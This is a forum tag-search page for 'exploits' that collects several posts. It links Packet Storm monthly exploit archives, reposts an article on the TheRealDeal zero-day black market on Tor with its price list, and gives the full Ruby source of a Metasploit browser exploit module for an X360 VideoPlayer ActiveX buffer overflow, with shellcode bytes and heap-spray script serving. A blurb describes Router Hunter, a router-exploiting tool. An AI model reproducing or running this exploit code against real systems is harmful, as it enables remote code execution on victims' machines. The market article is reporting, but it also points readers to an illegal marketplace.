Search the Community
Showing results for tags 'exploits'.
-
This archive contains all of the 207 exploits added to Packet Storm in June, 2017.
Download: 1706-exploits.tgz (743.8 KB)
-
169 exploits: https://packetstormsecurity.com/files/download/132117/1505-exploits.tgz
-
Introduction

Black markets deployed on anonymizing networks such as Tor and I2P offer all kinds of illegal products, including drugs and weapons. They represent a pillar of the criminal ecosystem, as these black markets are the privileged places to acquire illegal goods and services by preserving the anonymity of both sellers and buyers and making it difficult to track payment transactions operated through virtual currencies like Bitcoin. The majority of people ignore that one of the most attractive goods in the underground market are zero-day exploits, malicious codes that could be used by hackers to exploit unknown vulnerabilities in any kind of software.

The availability of zero-day exploits is a key element for a successful attack. The majority of state-sponsored attacks that go undetected for years rely on the exploitation of an unknown flaw in popular products on the market and SCADA systems.

Zero-day exploits: A precious commodity

Security experts have debated on several occasions the importance of the zero-day exploitation to design dangerous software that could target any kind of application. Zero-day exploits are among the most important components of any cyber weapons, and for this reason they are always present in the cyber arsenals of governments.

Zero-day exploits could be used by threat actors for sabotage or for cyber espionage purposes, or they could be used to hit a specific category of software (i.e. mobile OSs for surveillance, SCADA application within a critical infrastructure). In some cases, security experts have discovered large scale operations infecting thousands of machines by exploiting zero-day vulnerabilities in common applications (e.g. Java platform, Adobe software).
A few days ago, for example, security experts at FireEye detected a new highly targeted attack run by the APT28 hacking crew exploiting two zero-day flaws to compromise an “international government entity.” In this case, the APT28 took advantage of zero-day vulnerabilities in Adobe Flash software (CVE-2015-3043) and a Windows operating system (CVE-2015-1701).

Zero-day exploits are commodities in the underground economy. Governments are the primary buyers in the growing zero-day market. Governments aren’t the only buyers, however; exploit kits including zero-day are also acquired by non-government actors.

In 2013 it was estimated that the market was able to provide 85 exploits per day, a concerning number for the security industry, and the situation today could be worse. It has been estimated that every year, zero-day hunters develop a combined 100 exploits, resulting in 85 privately known exploits, and this estimation does not include the data related to independent groups of hackers, whose activities are little known.

Zero-day hunters are independent hackers or security firms that analyze every kind of software searching for a vulnerability. Then this knowledge is offered in black marketplaces to the highest bidder, no matter if it is a private company that will use it against a competitor or a government that wants to use it to target the critical infrastructure of an adversary.

A study conducted by the experts at NSS Labs in 2013 titled “The Known Unknowns” reported that every day during a period of observation lasting three years, high-paying buyers had access to at least 60 vulnerabilities targeting common software produced by Adobe, Apple, Microsoft and Oracle.

“NSS Labs has analyzed ten years of data from two major vulnerability purchase programs, and the results reveal that on any given day over the past three years, privileged groups have had access to at least 58 vulnerabilities targeting Microsoft, Apple, Oracle, or Adobe.
Further, it has been found that these vulnerabilities remain private for an average of 151 days. These numbers are considered a minimum estimate of the ‘known unknowns’, as it is unlikely that cyber criminals, brokers, or government agencies will ever share data about their operations. Specialized companies are offering zero-day vulnerabilities for subscription fees that are well within the budget of a determined attacker (for example, 25 zero-days per year for USD $2.5 million); this has broken the monopoly that nation states historically have held regarding ownership of the latest cyber weapon technology. Jointly, half a dozen boutique exploit providers have the capacity to offer more than 100 exploits per year.”

On the black market, a zero-day exploit for a Windows OS sells for up to $250,000 according to BusinessWeek, a good incentive for hackers to focus their efforts in the discovery of this category of vulnerabilities. The price could increase in a significant way if the bugs affect critical systems and the buyer is a government that intends to use it for Information Warfare.

What is very concerning is that in many cases, the professionals who discover a zero-day, in order to maximize gains, offer their knowledge to hostile governments who use it also to persecute dissidents or to attack adversary states.

The zero-day market follows its own rules, the commodities are highly perishable, the transactions are instantaneous, and the agreement between buyers and sellers is critical.

“According to a recent article in The New York Times, firms such as VUPEN (France), ReVuln (Malta), Netragard, Endgame Systems, and Exodus Intelligence (US) advertise that they sell knowledge of security vulnerabilities for cyber espionage. The average price lies between USD $40,000 and USD $160,000.
Although some firms restrict their clientele, either based on country of origin or on decisions to sell to specific governments only, the ability to bypass this restriction through proxies seems entirely possible for determined cyber criminals. Based on service brochures and public reports, these providers can deliver at least 100 exclusive exploits per year,” states the report.

In particular, the US contractor Endgame Systems reportedly offers customers 25 exploits a year for $2.5 million.

The uncontrolled and unregulated market of zero-day exploits poses a real threat for any industry. For this reason, security experts and government agencies constantly monitor its evolution.

The zero-day market in the Deep Web: “TheRealDeal” marketplace

Zero-day exploits have been available in several underground Deep Web marketplaces for a long time, and it is not difficult to find malicious codes and exploit kits in different black markets or hacking forums.

Recently a new black market dubbed TheRealDeal has appeared in the Deep Web. The platform was designed to provide both sellers and buyers a privileged environment for the commercialization of precious goods.

Figure – TheRealDeal Marketplace

TheRealDeal (http://trdealmgn4uvm42g.onion) service appeared last month and it is focused on the commercialization of zero-day exploits. The singular marketplace is hosted on the popular Tor network to protect the anonymity of the actors involved in the sale of the precious commodity.

The market offers zero-day exploits related to still unknown flaws and one-day exploits that have been already published, but are modified to be undetectable by defensive software.

Figure – One-day private exploits

The operators also offer one-day private exploits with known CVEs, but for which the code was never released. They also anticipated that a seller specialized in exploits for the GSM platform will soon offer a listing for some very interesting hardware.

Who is behind TheRealDeal?
The ‘deepdotweb’ website published an interview with one of the administrators of the black market who explained that the project is operated by four cyber experts with significant experience dealing in the “clearnet when it comes to zero-day exploit code, databases and so on.”

The administrator explained that the greatest risk in commercializing zero-day exploits is that in the majority of cases, the code does not work or simply the sellers are scammers.

Another factor that convinced the administrators to launch the TheRealDeal zero-day marketplace is the consideration that the places where it is possible to find the precious goods are not always easy to reach. There are some IRC servers that are not easy to find or that request an invitation. Differently, TheRealDeal wants to be an ‘open-market’ focused on zero-days.

The four experts decided to launch the hidden service to create a marketplace where people can trade zero-day exploits without becoming a victim of fraud and while staying in total anonymity.

“We started off by using BitWasp, fully aware of its history and flaws, but since we have years of hands-on experience in the security industry and not much in web-design we decided it would be a good platform since we can make our own security assessments and patches while the whole multi-sig seems to work perfect. We also wanted to avoid involving other people in the project for obvious reasons and that was another reason why not to hire a web designer etc… although we might hire one off the darknet soon, just to improve the UI a little,” said one of the administrators.
Below is the list of products available on the TheRealDeal marketplace:

0-Day exploits (4) FUD Exploits (4) 1Day Private Exploits (1) Information (5) Money (36) Source Code (4) Spam (3) Accounts (7) Cards Other Tools (3) RATs (1) Hardware (2) Drugs Misc (6) Pharmacy (12) Cannabis (5) LSD (1) Shrooms (2) MDMA (6) Speed (5) Services (8) Weapons Hot (1) Cold (6) CNC

Analyzing the product listing of TheRealDeal Market, it is possible to note the availability of zero-day exploits, which are source codes that could be used by hackers in cyber attacks, and of course any kind of hacking tool.

The list is still short because the market is still in an embryonic stage, but the policy of its directors is clear.

“Welcome…We originally opened this market in order to be a ‘code market’ — where rare information and code can be obtained,” a message from the website’s anonymous administrator reads. “Completely avoid the scam/scum and enjoy the real code, real information and real products.”

Among the products there is a new method of hacking Apple iCloud accounts and exploit kits that could be used to compromise WordPress-based websites and both mobile and desktop OSs (i.e. Android and Windows).

The price tag for the iCloud hack is $17,000, and as explained by the seller, it is possible to compromise any account. The buyer could pay in Bitcoin to make their identification difficult.

“Any account can be accessed with a malicious request from a proxy account,” reads the description of the hack available on TheRealDeal marketplace.
“Please arrange a demonstration using my service listing to hack an account of your choice.”

Figure – Zero-day exploits

The listing also includes an Internet Explorer attack that is offered for $8,000 in Bitcoin, as reported by Wired in a blog post:

“Others include a technique to hack WordPress’ multisite configuration, an exploit against Android’s Webview stock browser, and an Internet Explorer attack that claims to work on Windows XP, Windows Vista and Windows 7, available for around $8,000 in bitcoin … Found 2 months ago by fuzzing,” the seller writes, referring to an automated method of testing a program against random samples of junk data to see when it crashes. “0day but might be exposed, can’t really tell without risking a lot of money,” the seller adds. “Willing to show a demo via the usual ways, message me but don’t waste my time!”

The list of products has been recently updated. It also includes an exploit for the MS15-034 Microsoft IIS Remote Code Execution vulnerability, a flaw that is being actively exploited in the wild against Windows 7, 8, and 8.1, Windows Server 2008 R2, 2012, and 2012 R2.

TheRealDeal market also offers other products very common in the criminal ecosystem, including drugs, weapons, and Remote Access Trojan (RAT). The operators also created a specific “services” category with the intent to attract high-profile black hats offering their hacking services (i.e. Email account takeover, DDoS services, data theft, hacking campaign). The Information category was created for sellers that offer any kind of information, documents, databases, secret keys, and similar products.

TheRealDeal doesn’t implement a real escrow model; instead it adopts a multi-signature model to make any financial transaction effective. Basically, the buyer, the seller and the administrators control the amount of Bitcoin to transfer together, and any transaction needs the signature of two out of the three parties before funds are transferred.
The administrators decided to implement multisig transactions because their marketplace is very young and without reputation. This means that people have no incentive to deposit a sum of money for something that they are not able to verify.

It is curious to note that the marketplace also offers drugs due to high demand, but according to the administrators they might consider removing them in the future.

There is also a “services” category – anything can go there, but we are hoping for some high quality blackhats to come forward and offer their services, anything from obtaining access to an email and getting a certain document and up to long term campaigns. The hardware category is for toys like fake cellular base stations and other physical ‘hacking’ tools. The information category is for any kind of information, documents, databases, secret keys, etc.

In the following table are the principal product categories offered in the market and their prices.

Category: 0-Day exploits
- Apple id / iCloud remote exploit: USD 17025,52
- Internet Explorer <= 11: USD 7840,70
- Android WebView 0day RCE: USD 8176,73
- WordPress MU RCE: USD 1008,09

Category: FUD Exploits
- FUD .js download and execute: USD 291,23
- Adobe Flash < 16.0.0.296 (CVE-2015-0313): USD 560,05
- Adobe Flash < 16.0.0.287 (CVE-2015-0311): USD 560,05

Category: 1Day Private Exploits
- MS15-034 Microsoft IIS Remote: USD 42313,18

Category: Hardware
- A5/1 Encryption Rainbow Tables: USD 67,21

Category: Source Code
- Banking malware source code: USD 2,11
- Alina POS malware full source code: USD 0,92
- Exploit Kits Source Code: USD 1,82
- “Start your own maket” code and server: USD 7959,43

I’ll keep you updated on the evolution of the TheRealDeal marketplace in the next weeks.
References

http://securityaffairs.co/wordpress/36098/cyber-crime/therealdeal-black-marketplace-exploits.html
http://www.wired.com/2015/04/therealdeal-zero-day-exploits/
http://securityaffairs.co/wordpress/14561/malware/zero-day-market-governments-main-buyers.html
https://www.nsslabs.com/reports/known-unknowns-0
http://www.deepdotweb.com/2015/04/08/therealdeal-dark-net-market-for-code-0days-exploits/
-
This archive contains 174 exploits that were added to Packet Storm in April, 2015.
-
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::BrowserExploitServer

      def initialize(info={})
        super(update_info(info,
          'Name'           => "X360 VideoPlayer ActiveX Control Buffer Overflow",
          'Description'    => %q{
            This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
            X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
            a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Rh0', # vulnerability discovery and exploit, all the hard work
              'juan vazquez' # msf module
            ],
          'References'     =>
            [
              ['EDB', '35948'],
              ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
            ],
          'Payload'        =>
            {
              'Space'          => 1024,
              'DisableNops'    => true,
              'PrependEncoder' => stack_adjust
            },
          'DefaultOptions' =>
            {
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform'       => 'win',
          'Arch'           => ARCH_X86,
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :clsid   => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
              :os_name => OperatingSystems::Match::WINDOWS,
              :ua_name => Msf::HttpClients::IE,
              :ua_ver  => '10.0'
            },
          'Targets'        =>
            [
              [ 'Automatic', {} ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Jan 30 2015",
          'DefaultTarget'  => 0))
      end

      def stack_adjust
        adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
        adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
        adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
        adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset

        adjust
      end

      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")

        case request.uri
        when /exploit.js/
          print_status("Sending exploit.js...")
          headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
          send_exploit_html(cli, exploit_template(cli, target_info), headers)
        when /sprayer.js/
          print_status("Sending sprayer.js...")
          headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
          send_exploit_html(cli, sprayer_template(cli, target_info), headers)
        when /informer.js/
          print_status("Sending informer.js...")
          headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
          send_exploit_html(cli, informer_template(cli, target_info), headers)
        when /rop_builder.js/
          print_status("Sending rop_builder.js...")
          headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
          send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
        else
          print_status("Sending main.html...")
          headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
          send_exploit_html(cli, main_template(cli, target_info), headers)
        end
      end

      def main_template(cli, target_info)
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
        template = ''
        File.open(path, 'rb') { |f| template = strip_comments(f.read) }

        return template, binding()
      end

      def exploit_template(cli, target_info)
        shellcode = Rex::Text.to_hex(get_payload(cli, target_info))

        path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
        template = ''
        File.open(path, 'rb') { |f| template = strip_comments(f.read) }

        return template, binding()
      end

      def sprayer_template(cli, target_info)
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
        template = ''
        File.open(path, 'rb') { |f| template = strip_comments(f.read) }

        return template, binding()
      end

      def informer_template(cli, target_info)
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
        template = ''
        File.open(path, 'rb') { |f| template = strip_comments(f.read) }

        return template, binding()
      end

      def rop_builder_template(cli, target_info)
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
        template = ''
        File.open(path, 'rb') { |f| template = strip_comments(f.read) }

        return template, binding()
      end

      def strip_comments(input)
        input.gsub(/\/\/.*$/, '')
      end

    end
-
Router Hunter is a PHP script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices.
-
This archive contains all of the 118 exploits added to Packet Storm in April, 2013.
1,150,680 bytes 2 Dir(s) 33,536,339,968 bytes free Download Packet Storm New Exploits For April, 2013 ? Packet Storm